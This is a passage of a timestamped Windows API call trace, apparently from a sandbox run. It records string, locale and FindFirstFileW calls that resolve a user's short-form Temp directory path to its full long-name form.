[0163.401] SysReAllocStringLen (in: pbstr=0x28fda4*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda4*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0163.401] SysReAllocStringLen (in: pbstr=0x28fda8*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0163.401] GetThreadLocale () returned 0x409 [0163.401] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.401] GetThreadLocale () returned 0x409 [0163.401] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.401] GetFullPathNameW (in: lpFileName="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", lpFilePart=0x28fa90*=0x0) returned 0x26 [0163.401] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0163.401] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fcc0*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0163.401] CharLowerBuffW (in: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", cchLength=0x26 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 0x26 [0163.401] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0163.401] SysReAllocStringLen (in: pbstr=0x2ad25b8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x2ad25b8*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0163.401] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0x2ae1c98 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0163.402] SysReAllocStringLen (in: pbstr=0x28fd9c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fd9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0163.402] SysReAllocStringLen (in: pbstr=0x28fda0*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0163.402] GetThreadLocale () returned 0x409 [0163.402] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.402] GetThreadLocale () returned 0x409 [0163.402] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.402] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpFilePart=0x28fa90*=0x0) returned 0x25 [0163.403] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0163.403] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x28f7dc, lpFilePart=0x28f7d8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpFilePart=0x28f7d8*=0x0) returned 0x25 [0163.403] SysReAllocStringLen (in: pbstr=0x28fa1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28fa1c*="C:") returned 1 [0163.403] SysReAllocStringLen (in: pbstr=0x28f9d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f9d8*="C:\\") returned 1 [0163.403] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.403] SysReAllocStringLen (in: pbstr=0x28f9d4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28f9d4*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0163.403] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0163.403] SetLastError (dwErrCode=0x0) [0163.403] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\temp\\", cchCount1=37, lpString2="c:\\", cchCount2=3) returned 3 [0163.403] GetLastError () returned 0x0 [0163.404] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x28fa60, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0x108c78c, ftLastWriteTime.dwHighDateTime=0x28fa78, nFileSizeHigh=0x775d4628, nFileSizeLow=0x108c78c, dwReserved0=0x28fa94, dwReserved1=0x4a, cFileName="뽜Tﳘ(P", cAlternateFileName="댴Ĉ잌ĈJ")) returned 0xffffffff [0163.404] GetLastError () returned 0x2 [0163.404] SysReAllocStringLen (in: pbstr=0x28fa14*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fa14*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0163.404] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", len=0x24 | out: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1 [0163.404] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x28f524, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x28f520*="Temp") returned 0x24 [0163.405] SysReAllocStringLen (in: pbstr=0x28f764*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f764*="C:") returned 1 [0163.405] SysReAllocStringLen (in: pbstr=0x28f720*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f720*="C:\\") returned 1 [0163.405] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.405] SysReAllocStringLen (in: pbstr=0x28f71c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f71c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0163.405] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\") returned 0x20 [0163.405] SetLastError (dwErrCode=0x0) [0163.405] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0163.405] GetLastError () returned 0x0 [0163.405] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x28f914, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce2f19, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1070000, nFileSizeHigh=0x50, nFileSizeLow=0x108c830, dwReserved0=0x28f7dc, dwReserved1=0x4a, cFileName="댴Ĉﳔ(P", cAlternateFileName="쥄Ĉ죬ĈH")) returned 0xffffffff [0163.406] GetLastError () returned 0x2 [0163.406] SysReAllocStringLen (in: pbstr=0x28f75c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f75c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0163.406] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local", len=0x1f | out: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local") returned 1 [0163.406] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x28f26c, lpFilePart=0x28f268 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local", lpFilePart=0x28f268*="Local") returned 0x1f [0163.406] SysReAllocStringLen (in: pbstr=0x28f4ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f4ac*="C:") returned 1 [0163.407] SysReAllocStringLen (in: pbstr=0x28f468*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f468*="C:\\") returned 1 [0163.407] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.407] SysReAllocStringLen (in: pbstr=0x28f464*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f464*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0163.407] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\keecfm~1\\appdata\\") returned 0x1a [0163.407] SetLastError (dwErrCode=0x0) [0163.407] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0163.407] GetLastError () returned 0x0 [0163.407] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x28f65c, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce2f19, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1070000, nFileSizeHigh=0x50, nFileSizeLow=0x108c830, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="쥄Ĉ塚(P", cAlternateFileName="쩌Ĉ짴Ĉ>")) returned 0xffffffff [0163.407] GetLastError () returned 0x2 [0163.407] SysReAllocStringLen (in: pbstr=0x28f4a4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f4a4*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0163.408] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData\\", psz="C:\\Users\\KEECFM~1\\AppData", len=0x19 | out: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData") returned 1 [0163.408] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData", nBufferLength=0x104, lpBuffer=0x28efb4, lpFilePart=0x28efb0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData", lpFilePart=0x28efb0*="AppData") returned 0x19 [0163.408] SysReAllocStringLen (in: pbstr=0x28f1f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f1f4*="C:") returned 1 [0163.408] SysReAllocStringLen (in: pbstr=0x28f1b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f1b0*="C:\\") returned 1 [0163.409] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.409] SysReAllocStringLen (in: pbstr=0x28f1ac*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ac*="C:\\Users\\KEECFM~1\\") returned 1 [0163.409] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\", cchLength=0x12 | out: lpsz="c:\\users\\keecfm~1\\") returned 0x12 [0163.409] SetLastError (dwErrCode=0x0) [0163.409] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0163.409] GetLastError () returned 0x0 [0163.409] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x28f3a4, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce2f19, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1070000, nFileSizeHigh=0x40, nFileSizeLow=0x10869a0, dwReserved0=0x28f26c, dwReserved1=0x3e, cFileName="쩌Ĉ(P", cAlternateFileName="槴Ĉ梌Ĉ2")) returned 0xffffffff [0163.409] GetLastError () returned 0x2 [0163.409] SysReAllocStringLen (in: pbstr=0x28f1ec*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ec*="C:\\Users\\KEECFM~1\\") returned 1 [0163.409] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1\\", psz="C:\\Users\\KEECFM~1", len=0x11 | out: pbstr=0x28f474*="C:\\Users\\KEECFM~1") returned 1 [0163.410] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1", nBufferLength=0x104, lpBuffer=0x28ecfc, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users\\KEECFM~1", lpFilePart=0x28ecf8*="KEECFM~1") returned 0x11 [0163.423] SysReAllocStringLen (in: pbstr=0x28ef3c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ef3c*="C:") returned 1 [0163.423] SysReAllocStringLen (in: pbstr=0x28eef8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef8*="C:\\") returned 1 [0163.423] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.423] SysReAllocStringLen (in: pbstr=0x28eef4*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28eef4*="C:\\Users\\") returned 1 [0163.423] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0163.423] SetLastError (dwErrCode=0x0) [0163.423] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0163.424] GetLastError () returned 0x0 [0163.424] FindFirstFileW (in: lpFileName="C:\\Users\\" (normalized: "c:\\users"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x28f0ec, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce2f19, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1070000, nFileSizeHigh=0x40, nFileSizeLow=0x1086910, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="槴Ĉ(@", cAlternateFileName="뚜Ĉ뗴Ĉ\"")) returned 0xffffffff [0163.424] GetLastError () returned 0x2 [0163.424] SysReAllocStringLen (in: pbstr=0x28ef34*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28ef34*="C:\\Users\\") returned 1 [0163.424] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0163.424] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x28ea44, lpFilePart=0x28ea40 | out: lpBuffer="C:\\Users", lpFilePart=0x28ea40*="Users") returned 0x8 [0163.425] SysReAllocStringLen (in: pbstr=0x28ec84*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ec84*="C:") returned 1 [0163.425] SysReAllocStringLen (in: pbstr=0x28ec40*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec40*="C:\\") returned 1 [0163.425] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.425] SysReAllocStringLen (in: pbstr=0x28ec3c*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec3c*="C:\\") returned 1 [0163.425] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.425] SetLastError (dwErrCode=0x0) [0163.425] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0163.425] GetLastError () returned 0x0 [0163.426] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x28eca8 | out: lpFindFileData=0x28eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28ecfc, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0x108c030 [0163.430] FileTimeToLocalFileTime (in: lpFileTime=0x28ecbc, lpLocalFileTime=0x28ec38 | out: lpLocalFileTime=0x28ec38) returned 1 [0163.431] FileTimeToDosDateTime (in: lpFileTime=0x28ec38, lpFatDate=0x28ec8a, lpFatTime=0x28ec88 | out: lpFatDate=0x28ec8a, lpFatTime=0x28ec88) returned 1 [0163.431] FindClose (in: hFindFile=0x108c030 | out: hFindFile=0x108c030) returned 1 [0163.431] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0163.431] SysReAllocStringLen (in: pbstr=0x28ef2c*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x28ef2c*="C:\\Users") returned 1 [0163.432] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1bc*="C:\\Users\\") returned 1 [0163.432] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108c030 [0163.432] FileTimeToLocalFileTime (in: lpFileTime=0x28ef74, lpLocalFileTime=0x28eef0 | out: lpLocalFileTime=0x28eef0) returned 1 [0163.432] FileTimeToDosDateTime (in: lpFileTime=0x28eef0, lpFatDate=0x28ef42, lpFatTime=0x28ef40 | out: lpFatDate=0x28ef42, lpFatTime=0x28ef40) returned 1 [0163.432] FindClose (in: hFindFile=0x108c030 | out: hFindFile=0x108c030) returned 1 [0163.433] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1", psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj") returned 1 [0163.433] SysReAllocStringLen (in: pbstr=0x28f1e4*=0x0, psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f1e4*="C:\\Users\\kEecfMwgj") returned 1 [0163.433] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\kEecfMwgj", psz="C:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj\\") returned 1 [0163.433] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f26c, dwReserved1=0x3e, cFileName="AppData", cAlternateFileName="")) returned 0x108c030 [0163.434] FileTimeToLocalFileTime (in: lpFileTime=0x28f22c, lpLocalFileTime=0x28f1a8 | out: lpLocalFileTime=0x28f1a8) returned 1 [0163.434] FileTimeToDosDateTime (in: lpFileTime=0x28f1a8, lpFatDate=0x28f1fa, lpFatTime=0x28f1f8 | out: lpFatDate=0x28f1fa, lpFatTime=0x28f1f8) returned 1 [0163.434] FindClose (in: hFindFile=0x108c030 | out: hFindFile=0x108c030) returned 1 [0163.435] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0163.435] SysReAllocStringLen (in: pbstr=0x28f49c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f49c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0163.435] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0163.435] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0x108c030 [0163.435] FileTimeToLocalFileTime (in: lpFileTime=0x28f4e4, lpLocalFileTime=0x28f460 | out: lpLocalFileTime=0x28f460) returned 1 [0163.435] FileTimeToDosDateTime (in: lpFileTime=0x28f460, lpFatDate=0x28f4b2, lpFatTime=0x28f4b0 | out: lpFatDate=0x28f4b2, lpFatTime=0x28f4b0) returned 1 [0163.436] FindClose (in: hFindFile=0x108c030 | out: hFindFile=0x108c030) returned 1 [0163.436] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0163.436] SysReAllocStringLen (in: pbstr=0x28f754*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f754*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0163.436] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0163.436] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f7dc, dwReserved1=0x4a, cFileName="Temp", cAlternateFileName="")) returned 0x108c030 [0163.437] FileTimeToLocalFileTime (in: lpFileTime=0x28f79c, lpLocalFileTime=0x28f718 | out: lpLocalFileTime=0x28f718) returned 1 [0163.437] FileTimeToDosDateTime (in: lpFileTime=0x28f718, lpFatDate=0x28f76a, lpFatTime=0x28f768 | out: lpFatDate=0x28f76a, lpFatTime=0x28f768) returned 1 [0163.437] FindClose (in: hFindFile=0x108c030 | out: hFindFile=0x108c030) returned 1 [0163.438] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0163.438] SysReAllocStringLen (in: pbstr=0x28fa0c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fa0c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0163.438] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0163.438] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x28fa60, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0x108c78c, ftLastWriteTime.dwHighDateTime=0x28fa78, nFileSizeHigh=0x775d4628, nFileSizeLow=0x108c78c, dwReserved0=0x28fa94, dwReserved1=0x4a, cFileName="뽜Tﳘ(P", cAlternateFileName="댴Ĉ잌ĈJ")) returned 0xffffffff [0163.438] GetLastError () returned 0x2 [0163.439] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0163.439] SysReAllocStringLen (in: pbstr=0x28fa1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28fa1c*="C:") returned 1 [0163.439] SysReAllocStringLen (in: pbstr=0x28f9d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f9d8*="C:\\") returned 1 [0163.439] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0163.440] SysReAllocStringLen (in: pbstr=0x28f9d4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", 